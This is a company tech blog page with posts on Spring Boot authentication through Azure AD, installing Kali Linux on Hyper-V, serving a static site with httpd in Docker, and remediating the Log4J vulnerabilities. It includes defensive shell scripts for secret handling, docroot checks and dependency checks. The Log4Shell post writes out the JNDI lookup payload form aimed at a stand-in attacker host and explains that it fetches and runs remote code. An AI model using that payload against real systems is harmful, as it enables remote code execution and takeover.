AttainIT Technologies Blog

Technology and Security

Spring Boot Authentication with AzureAD Part 2

Spring Boot Authentication with Microsoft 365

In this second article of our series, we will start building a prototype that uses Spring Boot authentication to connect with Microsoft 365 Azure Active Directory (Azure AD). If you haven’t already completed part one of this series, please review that article now and create your Azure AD configuration.

Getting Started with Spring Initializr

To get the Spring Boot authentication prototype assembled quickly, first create an initial project structure using the Spring Initializr utility.

Spring Initializr, provided by Pivotal, is a web application that generates a Spring Boot project structure for you. Along with the structure, it provides a basic application class as well as either a Maven or a Gradle build script (we will use Gradle). The four Spring dependencies to add for our project are:

  • Azure Active Directory
  • OAuth2 Client
  • Spring Web
  • Thymeleaf

Spring Initializr Settings

Thymeleaf is a server-side Java templating engine for web applications. It is mature and carries far less overhead than a front-end framework such as Angular, which keeps our prototype focused on authentication and easier to read.

Spring Initializr Project Structure

After making the dependency selections, click the “GENERATE” button to download the project archive. As you can see from the snapshot below, Initializr has done a fair amount of grunt work for our prototype.

Spring Boot Prototype Project Structure

Upgrading Versions in the Build Script

Spring Initializr choices can be a bit restrictive. At the time of this writing, the website only supports using version 2.5.8 while importing the Azure AD dependency. Selecting another version will give you the following error:

Spring Initializr Version Error for Azure AD

However, this is easily remedied by upgrading the versions in your build script after generating and downloading the project files.

Upgrade Spring Boot and Azure AD Versions

We have upgraded both the Spring Boot and Azure AD versions in the build.gradle script. Note that we have also pinned a newer Log4J version to address the recent, high-profile Log4Shell vulnerabilities; a transitive Log4J dependency is affected even when your build never imports the library directly. Once Spring Boot’s managed Log4J version catches up, this override should no longer be necessary.

Sensitive Property Values

In part one of this series, we registered an application in Azure AD and collected three values required for our prototype: the “Application (client) ID”, the “Directory (tenant) ID” and the client secret. Treat these values as passwords: do not share them, and never commit them to GitHub or any other repository. Create the following file src/main/resources/
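
As an added illustration (not code from the original article), here is one way to wire those three values into the project without ever writing them to disk in plain text: the Spring properties file holds only ${...} placeholders, which Spring resolves from environment variables at startup, and a small check refuses any properties file that carries a literal value, so it can run as a pre-commit hook. The property names assume the azure-spring-boot-starter-active-directory 3.x starter (azure.activedirectory.*) and should be verified against the starter version pinned in build.gradle; the file and script names are our own choices.

```shell
#!/usr/bin/env bash
# Added example (not from the original article): keep the three Azure AD
# values out of source control by referencing environment variables from the
# Spring properties file, and fail fast if a literal secret ever lands in it.
# Property names assume the azure-spring-boot-starter-active-directory 3.x
# starter (azure.activedirectory.*); check them against the version you pinned.
set -eu

# Write a properties file whose values are Spring placeholders. Spring resolves
# ${AZURE_TENANT_ID} etc. from the environment at startup, so the file itself
# holds nothing sensitive and is safe to commit.
write_azure_properties() {
    out="$1"
    cat > "$out" <<'EOF'
# Resolved from the environment at runtime; never put the real values here.
azure.activedirectory.tenant-id=${AZURE_TENANT_ID}
azure.activedirectory.client-id=${AZURE_CLIENT_ID}
azure.activedirectory.client-secret=${AZURE_CLIENT_SECRET}
EOF
}

# Return 0 if every sensitive key in the file is a ${...} placeholder,
# 1 if any key is missing or carries a literal value (pre-commit check).
check_no_literal_secrets() {
    file="$1"
    rc=0
    for key in tenant-id client-id client-secret; do
        val=$(grep -E "^[[:space:]]*azure\.activedirectory\.$key[[:space:]]*=" "$file" \
              | head -n1 | cut -d= -f2- | tr -d '[:space:]')
        case "$val" in
            '${'*'}') ;;                                   # placeholder: fine
            '')  echo "missing key: $key in $file" >&2; rc=1 ;;
            *)   echo "literal value for $key in $file" >&2; rc=1 ;;
        esac
    done
    return $rc
}

# A developer may keep a local override file with real values while testing;
# make sure that path is ignored by git (idempotent: adds the entry once).
ensure_gitignored() {
    repo="$1"; path="$2"
    touch "$repo/.gitignore"
    grep -qxF "$path" "$repo/.gitignore" || echo "$path" >> "$repo/.gitignore"
}

# Usage: sh secrets-check.sh --demo   (script name is a hypothetical choice)
if [ "${1:-}" = "--demo" ]; then
    dir=$(mktemp -d)
    write_azure_properties "$dir/application.properties"
    check_no_literal_secrets "$dir/application.properties" && echo "OK: placeholders only"
    ensure_gitignored "$dir" "src/main/resources/application-local.properties"
    cat "$dir/.gitignore"
    rm -rf "$dir"
fi
```

Export AZURE_TENANT_ID, AZURE_CLIENT_ID and AZURE_CLIENT_SECRET in the shell (or the IDE run configuration) that starts the application; the check only looks at the committed file, so a real value in a git-ignored local override is still fine.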


Spring Boot Authentication Prototype

Our prototype is now stubbed out and ready for implementation. Part 3 of this series will focus on the code changes necessary to authenticate with Microsoft 365.

Kali Hyper-V

How to Install Kali Linux on Hyper-V

This article documents the process of installing Kali Linux as a virtual machine running on a Windows 10 workstation using Hyper-V. The installation has numerous steps but most of them involve accepting default values. Rather than include all of the screenshots inline (which will become unwieldy), this article will be broken into several pages. An overview will be discussed and the full series of screenshots will be included as appendix pages.

What is Kali Linux

Kali Linux (formerly known as BackTrack Linux) is an open-source, Debian-based Linux distribution aimed at advanced Penetration Testing and Security Auditing.

Kali Linux documentation

What is Hyper-V

Hyper-V is Microsoft’s hardware virtualization product. It lets you create and run a software version of a computer, called a virtual machine. Each virtual machine acts like a complete computer, running an operating system and programs. When you need computing resources, virtual machines give you more flexibility, help save time and money, and are a more efficient way to use hardware than just running one operating system on physical hardware.

Microsoft Hyper-V overview

Installation Overview

Installing Kali Linux on a Windows 10 workstation using Hyper-V involves the following steps:

  • Download the Kali Linux ISO image
  • Configure a new Hyper-V Virtual Machine
  • Install and Configure Kali Linux Operating System
  • Log in to the Kali Linux VM

Downloading Kali Linux

Kali Linux is an open-source Linux distribution with several installation options. For our purposes, we will pull the ISO image of the most recent stable build from the Kali Linux Download page. Verify the download against the SHA256 checksum Kali publishes alongside the images before booting from it; a tampered installer would undermine everything you build on top of it.

There are several preconfigured virtual machines provided by Kali, but unfortunately Hyper-V is not one of them. We will instead select the recommended option for the “Bare Metal” installer.

Download Kali Linux Bare Metal Option

Configure a new Hyper-V Virtual Machine

We assume you already have Hyper-V installed and running on your workstation. If not, please follow the Microsoft documentation for enabling the software.

Open Hyper-V Manager, then right-click your workstation and select “New | Virtual Machine.”

Creating a new Hyper-V VM

You must complete several screens of options to configure the VM. Steps worth noting:

  • Assign Memory: change the default from 1024 MB to 2048 MB
  • Connect Virtual Hard Disk: the default is larger than needed; 20 GB is more than adequate for a starter Linux VM
  • Installation Options: point the VM at the downloaded ISO image

There is a full listing of screenshots included in the Hyper-V Screenshot Appendix. After creating the VM by pressing Finish, you can begin the Kali Linux installation.

Install and Configure Kali Linux

Right-click on the newly created VM and select Connect:

Connecting to a Kali Linux VM using Hyper-V

There are almost two dozen configuration screens for the OS installation. Fortunately most of the steps can use default values. There is a full listing of screenshots included in the Kali Linux Screenshot Appendix. Fill out each configuration page and make sure to remember your username and password.

Log in to the Kali Linux VM

After the last battery of questions, the VM will reboot itself and be ready for use with the login credentials you provided during setup.

Kali Linux Login Screen

Enter the username and password to log in to the desktop:

Kali Linux Desktop

Note that the initial user is not root itself, but it is a member of the sudo group and can elevate to root at will. To verify this, open a terminal window and use sudo to become root:

Kali Linux Root User

At this point your Kali Linux VM is complete. See the following pages for a complete listing of screenshots from the installation process.

Apache httpd Docker Container

Getting Started with httpd on Docker

This article documents how to get started using Apache httpd on Docker. We will create a static website prototype using Windows 10. The website will start as a simple html page. We’ll then integrate the Bootstrap framework to allow us to easily include modern look and feel features. Finally, we will import Font Awesome to give the page some graphic icons.

If you work in IT, sooner or later you are going to find yourself needing to mock up a webpage or two. Maybe you have something to demonstrate to a customer. Or maybe your own website is a bit old and tired and needs a refresh (it happens to the best of us).

Many will follow the path of least resistance and try to hack a solution together using only a text editor and a browser. This works for the simplest of cases, but it won’t take long before you need something a little more robust.

HTTP Server (httpd)

Apache httpd web server

Apache httpd has a long track record and remains one of the most widely deployed open source web servers on the internet. It offers everything you need to get up and running quickly.

Before containers, using a full featured web server on your workstation often came with a few headaches, not the least of which was installation. If you were building on Windows, you also needed to deal with the Control Panel and Firewall settings. Sometimes you already had a web server running and needed to deconflict ports. All of these problems disappear with the ability to quickly launch an isolated environment in a container.

Using Containers

Docker logo

Docker is a software platform for managing containers. It enables developers to bundle applications into containers—standardized executable artifacts combining source code with operating system libraries and dependencies required to run that code.

We are going to assume you already have it running on your workstation. If not, there is no shortage of tutorials available online. Once the software is installed, Docker Hub is used to locate the official Apache httpd image and start the prototype.

Getting Started

We are running Windows 10 and using the Windows Subsystem for Linux (WSL2, Ubuntu) for our commands. The first step is to create a directory and use a text editor to create the most basic of web pages.

Simple HTML webpage

After saving our webpage, we will launch a container from the same directory with the following command:

docker run -dit --name my-apache-app -p 8080:80 -v "$PWD":/usr/local/apache2/htdocs/ httpd:2.4

The container launches in just a few seconds and is hosting our simple webpage on localhost port 8080. Keep in mind that the bind mount hands httpd the entire working directory and that -p 8080:80 publishes the port on every interface of the host, so keep the directory free of anything you would not want served to the rest of your network.

Docker commands to run httpd
Hello World webpage running in a container
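
A caveat worth turning into a check, with an added example that is not from the original article: -v "$PWD":/usr/local/apache2/htdocs/ serves everything in the working directory, a .git folder, an .env file and editor swap or backup files included, and -p 8080:80 makes the prototype reachable from the LAN. The launcher below refuses to start when the directory contains such files, then starts httpd bound to loopback only with a read-only mount. The script name and the list of risky file names are our own choices.

```shell
#!/usr/bin/env bash
# Added example (not part of the original article): a launcher that guards
# the docker run command above. Bind-mounting "$PWD" into htdocs publishes
# everything in that directory, and "-p 8080:80" listens on every interface
# of the host. Refuse to start if the directory holds files that should not
# be served, then start httpd with a read-only mount bound to loopback only.
set -eu

# Names that should never live in a served directory (extend to taste).
RISKY_PATTERNS='.git .env *.bak *.swp *.orig *~ id_rsa *.pem *.key'

# Return 0 if DIR contains none of the risky names at any depth, else 1
# and list what was found on stderr.
check_docroot() {
    dir="$1"; found=0
    set -f                      # stop the shell from globbing the patterns
    for pat in $RISKY_PATTERNS; do
        hits=$(find "$dir" -name "$pat" 2>/dev/null || true)
        if [ -n "$hits" ]; then
            printf 'refusing to serve:\n%s\n' "$hits" >&2
            found=1
        fi
    done
    set +f
    return $found
}

# Build the hardened launch command: a loopback-only port binding so the
# prototype is not reachable from the LAN, and a read-only mount so the
# container cannot write back into the working tree.
httpd_run_cmd() {
    dir="$1"; name="${2:-my-apache-app}"; port="${3:-8080}"
    printf 'docker run -dit --name %s -p 127.0.0.1:%s:80 -v "%s":/usr/local/apache2/htdocs/:ro httpd:2.4\n' \
        "$name" "$port" "$dir"
}

# Usage: sh serve.sh --run [dir]   (script name is a hypothetical choice)
if [ "${1:-}" = "--run" ]; then
    dir=$(cd "${2:-.}" && pwd)
    check_docroot "$dir"
    cmd=$(httpd_run_cmd "$dir")
    echo "$cmd"
    eval "$cmd"
fi
```

Because the mount is read-only, edits still happen on the host side and a browser refresh picks them up exactly as before; the container simply loses the ability to modify the tree.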

Importing Vendor Frameworks

Next we will import two commonly used software frameworks for building our website prototype: Bootstrap and Font Awesome. First create a vendor directory, and then download and unpack the two frameworks. This will give you a directory structure as follows:

Importing web frameworks

With the two frameworks installed, edit the original html page. We need to add the necessary links to the framework, as well as additional code to demonstrate the functionality.

Updated webpage using Bootstrap and Font Awesome

After the file has been updated and saved, simply refresh the browser.

Final webpage example

Cleaning Up

The container will continue running until you stop it with the following command:

docker container stop my-apache-app

Once completely done, you can delete the container with this command:

docker container rm my-apache-app

Spring Boot Authenticate With AzureAD

Spring Boot Authentication with Microsoft 365

In this first article of a multipart series, we will configure Microsoft 365 Azure Active Directory (Azure AD) to support a web application that uses Spring Boot authentication. The official Microsoft documentation highlights the key concepts for this process but rushes through several steps. In later articles we will build an example OAuth2-authenticated application that uses this Azure AD configuration.

Spring Boot Authentication Overview

A number of steps are needed to build an OAuth2 Spring Boot user authentication example using Azure AD. Before we can begin coding, we need an active Microsoft 365 Business subscription configured to support our web application. Once Microsoft 365 is configured, we can use properties obtained from the portal to bootstrap the Spring Boot starters for OAuth2 and Azure AD.

What is Microsoft 365

Formerly known as Office 365, this monthly subscription from Microsoft is ubiquitous in the business world. Most customers purchase it for the core office applications and email, but it also includes an often overlooked feature: most business subscription plans include a license for a basic tier of Azure AD, Microsoft’s cloud identity and access management service.


For the purposes of this article, we’ll assume you have a typical small business setup. That means you already have a Microsoft 365 subscription, several user accounts, and have administrator access to the Microsoft portal.

Manage Azure AD

There are two primary ways to get to Azure AD via a web browser: start at the top of the Microsoft portal and navigate your way through the maze, or go directly to the portal’s Azure AD page. Once there, click the button to view “Manage Azure Active Directory”.

Manage Azure Active Directory

Register an Application in Azure AD

The first step in this configuration is to create a new application profile. Select “App Registrations” from the main menu in Azure AD and complete the form by adding a name, keeping the default options, and clicking the “Register” button.

Azure AD Register App

The new application will be displayed with a number of system generated identifiers, as seen below.

Azure AD Application

Two of these values will be needed for the Spring Boot authentication example application. Use the clipboard icon to copy the “Application (client) ID” and “Directory (tenant) ID” values and store them in a safe location for later. Neither is a secret in the way the client secret created in the next step is (both appear in plain sight in sign-in URLs), but together they identify your tenant and application to anyone probing it, so keep them out of public repositories all the same.

Adding a Client Secret

Click the “New Client Secret” option from the “Certificates & Secrets” menu of your registered application.

Add Client Secrets

Add a “description” and select an “Expires” option from the form. Set the expiration length based on your company’s security policies and posture. Generally the shorter the expiry the better. But note that this value also greatly depends on your level of IT support staffing to determine how frequently the secret can be rotated and downstream applications updated.

Add Client Secret Form

The generated client secret appears in the list with a Secret ID and a Value. The Value is the actual secret and is displayed only once, immediately after creation; treat it like a password.

Client Secret

Make a copy of the “Value” now and store it in a safe location; once you leave the page it cannot be retrieved, only replaced by a new secret. You may also want to add the expiry date to an ops calendar so the rotation is not overlooked in the future.

Configure Platform Authentication

From the app registration, select the “Authentication” menu and then click “Add a platform“.

Add Authentication Platform

Choose the “Web” option from the resulting “Configure platforms” form. Note that depending on your Microsoft 365 subscription level, you may see more platform options.

Select Authentication Platform

Add a redirect URI to support local workstation development. Choose a value that will not collide with any other routing in your application; the recommended default is seen below. Azure AD matches redirect URIs exactly, so the value registered here must be precisely what the application sends, and plain http is only permitted for localhost addresses.

Configure Authentication Platform

Copy the default “Redirect URI” shown below, leave all other default values in place, and click the “Configure” button.


Create Application Roles

Now that we have the OAuth2 redirect configured for the application, we need to create application roles. An application’s roles will vary greatly depending on its purpose. For our example, we will only create an administrator (super user) role. In a real application, you will most likely have several roles supporting various types of functionality.

Select the “App roles” menu from the app registration, then click “Create app role“.

Add Application Role

Provide the form values then click “Apply“.

Add Administrator Role

There is some discretion on how you name the roles. For this example, set the value (used in the code) in all caps and the other values in proper case.

Assign Users and Groups

Select “Enterprise applications” from the Azure AD portal menu. Next select your application from the list of “All applications“. Finally, select “Users and groups” and click “Add user/group“.

Assign Users

Select a user in your organization, then add a role and click “Assign“. If you created several roles earlier, repeat this process for each of them.

Add Assignment

Note that your Microsoft 365 subscription level determines what assignments you can make; basic subscriptions only allow you to assign users directly (no group assignments).

Spring Boot User Authentication Example

This completes the basic setup for Azure AD. In the next article, we will use Spring Initializr to start a new Java project using Gradle.

Log4J Vulnerabilities in Spring Boot

Spring Boot Updates for Log4J Vulnerabilities

Hackers continue to scan for and exploit systems containing Log4J vulnerabilities at an unprecedented rate. On 10 December, the Spring Blog published detailed instructions for remediating Spring Boot applications built with Maven or Gradle; the solution pattern is still accurate, but the version it documents is now out of date. Remember that even if your build does not import the library explicitly, it may still be present as a transitive dependency, so check the resolved dependency tree rather than the declared dependencies.

Latest Release for Log4J Vulnerabilities

The fixed release of Log4J 2 is now version 2.17.1 (documented in our previous article). Spring Boot manages the Log4J version on your behalf; to force it to resolve the most recent release, override the managed version in your Gradle build script:

// build.gradle: override Spring Boot's managed Log4J 2 version
ext['log4j2.version'] = '2.17.1'
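
The transitive-dependency warning above deserves a check rather than a hope. The script below is an added example, not part of the original post: it reads a Gradle dependency report (what ./gradlew dependencies --configuration runtimeClasspath prints), pulls out every resolved log4j-core version, including ones that a "requested -> resolved" conflict line replaces, and flags anything below the release you pinned. A constructed sample report is embedded so it runs offline; point it at real Gradle output to use it.

```shell
#!/usr/bin/env bash
# Added example (not from the original article): find the Log4J versions a
# Gradle build actually resolves, transitive ones included, and flag anything
# below the release you pinned. Feed it the output of
#   ./gradlew dependencies --configuration runtimeClasspath
# A constructed sample report is embedded below so the script runs offline.
set -eu

# Constructed sample in Gradle's dependency-tree format: the Spring starter
# resolves to 2.17.1, but a legacy library still drags in 2.14.1.
sample_report() {
    cat <<'EOF'
runtimeClasspath - Runtime classpath of source set 'main'.
+--- org.springframework.boot:spring-boot-starter-log4j2 -> 2.6.2
|    +--- org.apache.logging.log4j:log4j-slf4j-impl:2.14.1 -> 2.17.1
|    |    +--- org.apache.logging.log4j:log4j-api:2.17.1
|    |    \--- org.apache.logging.log4j:log4j-core:2.17.1
|    \--- org.apache.logging.log4j:log4j-jul:2.17.1
\--- com.example:legacy-lib:1.0
     \--- org.apache.logging.log4j:log4j-core:2.14.1 (*)
EOF
}

# Print the distinct log4j-core versions Gradle resolved. "a:b:X -> Y" means
# X was requested but Y was chosen, so Y is what ends up on the classpath.
resolved_log4j_core_versions() {
    grep -oE 'org\.apache\.logging\.log4j:log4j-core:[^ ]+( -> [^ ]+)?' "$1" \
        | awk '{ if ($2 == "->") print $3; else { n = split($1, p, ":"); print p[n] } }' \
        | sort -u
}

# Return 0 if dotted numeric version $1 >= $2, 1 otherwise (2.17.1 > 2.17).
version_ge() {
    a="$1"; b="$2"
    while [ -n "$a" ] || [ -n "$b" ]; do
        ai=${a%%.*}; bi=${b%%.*}
        case "$a" in *.*) a=${a#*.} ;; *) a='' ;; esac
        case "$b" in *.*) b=${b#*.} ;; *) b='' ;; esac
        if [ "${ai:-0}" -gt "${bi:-0}" ]; then return 0; fi
        if [ "${ai:-0}" -lt "${bi:-0}" ]; then return 1; fi
    done
    return 0
}

# Return 0 if every resolved log4j-core is at least version $2, else 1 and
# list the offenders on stderr.
check_log4j() {
    report="$1"; min="$2"; rc=0
    for v in $(resolved_log4j_core_versions "$report"); do
        if version_ge "$v" "$min"; then
            echo "ok: log4j-core $v"
        else
            echo "VULNERABLE: log4j-core $v < $min" >&2
            rc=1
        fi
    done
    return $rc
}

# Usage: sh log4j-check.sh --demo   (script name is a hypothetical choice)
if [ "${1:-}" = "--demo" ]; then
    f=$(mktemp); sample_report > "$f"
    check_log4j "$f" 2.17.1 || echo "fix the offending dependency, then re-run"
    rm -f "$f"
fi
```

In the sample the ext['log4j2.version'] override only corrects the Spring-managed copy; the 2.14.1 pulled in by the legacy library still appears in the tree and is what the check catches, which is exactly the case the transitive-dependency warning is about.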

Log4J Vulnerability Update (2.17.1)

Several weeks out from the initial zero-day disclosure, the IT world continues to work through the remediation and fallout from the Apache Log4J vulnerability. First published as CVE-2021-44228 (Log4Shell) on 9 December 2021, it has been followed by further CVEs as quick-turnaround patches failed to completely resolve the problem. The most recent release is 2.17.1 (28 December), which fixes CVE-2021-44832, a remote code execution (RCE) flaw in 2.17.0 and earlier that requires the attacker to control the logging configuration (via the JDBC Appender).

This family of vulnerabilities affects millions of computers, clouds, networks, and IoT devices ranging from the size of postage stamps to automobile chargers. It derives from the use of a ubiquitous piece of software, Log4J, which is mostly unknown to those outside of the IT industry. This open source code is used to generate files containing records of events that occur in software written in (or somehow leveraging) the Java programming language.

Hackers, whether independents or state actors, continue to scan the internet for vulnerable systems as IT teams race to patch. Once a vulnerable host is found, the attacker submits input that will end up in a log, such as a crafted User-Agent header or username, containing a JNDI lookup string of the form ${jndi:ldap://<attacker host>/...}; vulnerable Log4J versions resolve the lookup, fetch a class from the attacker’s server and execute it. These exploits can open a reverse shell that gives the attacker remote control of the targeted device.

As concerning as the exploit is itself, even more concerning is the pervasive use of Log4J leading this vulnerability to be described by the U.S. Cybersecurity & Infrastructure Security Agency (CISA) Director as one of the most serious she has seen in her career.

As of today, the remediation path is to upgrade impacted software to the latest Log4J 2 release, version 2.17.1. (Log4J 1.x is not affected by Log4Shell itself, but it has been end-of-life since 2015 and has separate issues of its own, so it is not a safe place to stay.) At the time of writing, the 2.17.1 release is available on the Apache site but has not yet propagated to central repositories such as Maven Central.

CISA has published a response page which lists the history as well as recommended remediation paths for this exploit. Large vendors continue to release updates, including Amazon, IBM, and Google, but a significant concern also remains with smaller IT shops that do not have the workforce to quickly identify and push out updates.

If you have not already remediated systems that you are responsible for, it is long overdue that you do…
